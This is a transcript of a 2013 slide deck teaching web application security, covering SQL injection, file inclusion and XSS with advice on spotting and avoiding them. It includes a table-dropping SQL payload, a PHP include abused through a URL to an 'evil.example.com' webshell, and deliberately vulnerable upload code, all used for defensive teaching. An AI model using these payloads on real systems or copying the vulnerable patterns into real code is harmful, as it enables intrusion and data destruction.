Web Application Security
-
Upload
ynon-perek -
Category
Technology
-
view
1.460 -
download
2
description
Transcript of Web Application Security
Agenda
n Intro to Web Security
n Web Application Architecture
n Code Injections
n Request Forgeries
n Losing Trust
Monday, April 29, 13
Reasons for Security
Monday, April 29, 13
Reasons for Security
n Reliable systems are secure
n Security of a system = Security of the weakest part
n Hard to fix after system is ready
n Everyone should care
Monday, April 29, 13
How It All Started
n John Draper (Cap’n Crunch)
n phreaking in the 70s
Monday, April 29, 13
How It All Started
n 1986 Brain
n 1988 Morris
n Both (meant as) harmless
n Lead to CERT
Monday, April 29, 13
How It All Started
n 90s gave birth to phishing attacks
n AOL being the first victim
Monday, April 29, 13
How It All Started
n Security became an issue
n 2003 Summer of worms
n Blaster, Nachi, SoBig
Monday, April 29, 13
IT Security Today
NPR.org Hacked; 'Syrian Electronic Army' Takes ResponsibilityApril 16,
Monday, April 29, 13
IT Security Today
Monday, April 29, 13
IT Security Today
Monday, April 29, 13
IT Security Today
איזה פחד, כל מה שצריך כדי להפיל מטוס זה אנדרואיד
מאת נועה זהבי רז 12 באפריל 2013, 10:04. תגובה אחת. שייך לקטגוריות אבטחת מידע, סלולר
האקר גילה כי בתוכנות מגדלי הפיקוח ישנה פריצת אבטחה חמורה – הטייס לא יכול לדעת מי באמת שולח לו את ההודעה.
באמצעות אפליקצייה שפיתח ניתן להשתלט על מטוס ואף לרסקו
Monday, April 29, 13
Why Is It Hard ?
n Secure code problems:
n Lack of knowledge
n Carelessness
Monday, April 29, 13
Secure From The Start
n Fixing security errors after coding is expensive
n Writing secure code is easy
Monday, April 29, 13
Q & A
Monday, April 29, 13
Web ApplicationsMonday, April 29, 13
Web ArchitectureClient Server
GET Data
Send Response
Monday, April 29, 13
Server Side
n Creates data and sends back to client
n Data can be: HTML, JSON, XML, Images and more
n Choose your flavor
Monday, April 29, 13
Server Side Flaws
n Code injections
n Information leak
Monday, April 29, 13
Client Side
n Web browser takes data and renders on screen
n Browsers: IE, Firefox, Chrome, Safari
n Languages: JavaScript, ActionScript, Java (Applets)
Monday, April 29, 13
Client Side Flaws
n Code injections
n Information leak
Monday, April 29, 13
Web Weakness
n Client-Server gap is too easy
n HTTP is state-less
n Many different technologies and vendors
n Code/Data intermix
n It’s way more complicated than it looks
Monday, April 29, 13
Code Injections
n Query Injections (SQL, XPath, LDAP)
n Remote File Inclusion
n JavaScript Injections ( XSS, CSRF )
Monday, April 29, 13
SQL Injections
n Started in 1999
n (Probably) the most famous technique
n 83% of data breaches 2005-2011
n attack rate: 70 attempts / hour
Monday, April 29, 13
Famous Victims
n (2002) guess.com revealed 200K customer names and credit cards
n (2007) Microsoft UK Defacement
n (2009) RockYou DB hacked for 30Mil users
n (2011) MySql.com hacked
n (2012) Yahoo lost 450K login credentials
Monday, April 29, 13
SQL Injections
Monday, April 29, 13
What Did Bobby Break
$query = "SELECT name, grade " + "FROM students " + "WHERE name = '$user'"
Monday, April 29, 13
What Did Bobby Break
$query = "SELECT name, grade " + "FROM students " + "WHERE name = 'Robert'; DROP TABLE students'"
Expected datagot code
Monday, April 29, 13
SQLi Examples
n See if you can log in
n Login form code:https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/Login.pm
Monday, April 29, 13
SQLi Example
n See if you can print out names and passwords
n https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/InfoLeak.pm
Monday, April 29, 13
Affected Languages
n All programming languages
n Usually found in ASP, Java, Perl and PHP
Monday, April 29, 13
Bug Spotting
n Search for code that:
n Takes user input
n Does not validate input
n Uses input to talk to DB
Monday, April 29, 13
Bug Spotting
n In code review
n Find DB code
n Make sure its input is sanitized
Monday, April 29, 13
Black-Box Spotting
n Many automated tools will help you find SQL Inejctions
n Popular: Havijhttp://www.itsecteam.com/products/havij-v116-advanced-sql-injection/
Monday, April 29, 13
How To Avoid
n Use prepared statements
n Demo:
SELECT name, grade FROM students WHERE name=?
? are later boundto data
Monday, April 29, 13
How To Avoid
n Sanitize your input. Always
n Demo:
if ( ! $name =~ /^[a-z]+$/ ) { die "Invalid Input";} if ( ! $age =~ /^[0-9]+$/ ) { die "Invalid Input";}
Monday, April 29, 13
Extra Precautions
n Keep users passwords hashed in the DB
n Encrypt important data in DB
n Microsoft URLScan
n TrustWave ModSecurity (Open Source)
Monday, April 29, 13
Q & ASQL Injections
Monday, April 29, 13
Remote File Inclusion
n Users upload files
n Some files are dangerous
n OR
n Server loads files based on user input
Monday, April 29, 13
The Risk
<?php if (isset( $_GET['COLOR'] ) ){ include( $_GET['COLOR'] . '.php' ); }?>
With /vulnerable.php?COLOR=http://evil.example.com/webshell.txt
Monday, April 29, 13
Local File Inclusion
n Other bugs allow attacker to upload a PHP file to your server
n Usually missing upload file name tests
Monday, April 29, 13
Demo: imgur
Monday, April 29, 13
The RiskServer
Save editor.phpupload.php
uploads/editor.php
Monday, April 29, 13
Remote File Demoif ($_POST['url']) { $uploaddir = $_POST['url'];} $first_filename = $_FILES['uploadfile']['name'];$filename = md5($first_filename);$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));$file = $uploaddir . basename($filename . '.' . $ext); if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) { echo basename($filename . '.' . $ext);} else { echo 'error';}
Monday, April 29, 13
Example: OpenBB
PHP remote file inclusion vulnerability in Open Bulletin Board (OpenBB) 1.0.8 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) index.php and possibly (2) collector.php.
CVE-2006-4722
Monday, April 29, 13
Bug Spotting
n Search for code that loads external files
n Search for code that stores external files
n Make sure file name is sanitized
Monday, April 29, 13
How To Avoid
n Avoid by sanitizing your input
n Don’t allow uploads if you don’t have to
Monday, April 29, 13
Other Injections
n XPath Injection
n LDAP Injection
Monday, April 29, 13
Demo
n Try to find a company’s id using:https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XPathInjection/Leak.pm
Monday, April 29, 13
Client-Side Injections
n A relatively new category of injections uses Client Side languages (mainly JavaScript)
n Attacker uses website to attack other users
Monday, April 29, 13
JavaScript Injections
Evil Hacker
Honest User
Web Application
(Email)
Send message to honest user
Message includes evil JS code
Monday, April 29, 13
JavaScript Security
n Browsers use a security policy called “Same Origin Policy”
n A page has an origin
n Some actions are restricted to the page’s origin
Monday, April 29, 13
JavaScript Risks
n Same Origin Policy protects the following:
n Unauthorized access to cookies
n Unauthorized access to canvas
n Unauthorized AJAX calls
Monday, April 29, 13
Famous Injections
n XSS is the most famous JavaScript injection
n Variants: Inject code to flash
Monday, April 29, 13
Famous Injections
Monday, April 29, 13
Famous Injections
Twitter, Sep 2010
Monday, April 29, 13
Famous Injections
Yahoo, Jan 2013
Monday, April 29, 13
Famous Injections
n “Sammy Is My Hero”
n (2005) Sammy’s worm infected a Million accounts in less than 20 hours
Monday, April 29, 13
Famous Injections
Monday, April 29, 13
Examples
n Throwing users out of a public chat room
n Getting a user to send a “fake” message
https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/JSInjection/Chatter.pm
Monday, April 29, 13
Examples
n Hijacking a user’s session through messaging
n Getting a user to send a fake message
https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XSS/SessionHijack.pm
Monday, April 29, 13
Bug Spotting
n Search for code that writes markup to user
n Verify all output is sanitized
Monday, April 29, 13
Bug Spotting
n http://xsser.sourceforge.net/
n Python script that detects XSS bugs in sites
Monday, April 29, 13
Avoiding The Bug
n Use the framework
n Sanitize your output
n Consider other users
Monday, April 29, 13
Q & AClient-Side Injections
Monday, April 29, 13
Code Weak Spots
n Injections are more likely to occur in:
n Cookies
n HTTP Headers
n Don’t forget to sanitize these too
Monday, April 29, 13
Web Security
n Security of a system = the weakest part
n System breaches usually involve more than one vulnerability
n Use the power of frameworks
Monday, April 29, 13
Thanks For Listening
n Ynon Perek
n http://ynonperek.com
Monday, April 29, 13